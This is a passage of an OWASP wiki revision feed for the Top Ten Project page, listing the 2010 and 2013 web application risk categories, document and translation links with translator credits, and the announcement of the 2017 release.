* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235625</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235625"/>
				<updated>2017-11-19T22:51:41Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: more 2017 cleanup&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 Released==&lt;br /&gt;
The OWASP Top 10 - 2017 will be available for download on &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;20  November, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;. We are asking for comments to be submitted on the project's [https://github.com/OWASP/Top10/issues GitHub issues].&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_GM_(en).pdf | OWASP Top 10 2017 GM - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub](preferred)&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 - RC2 Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
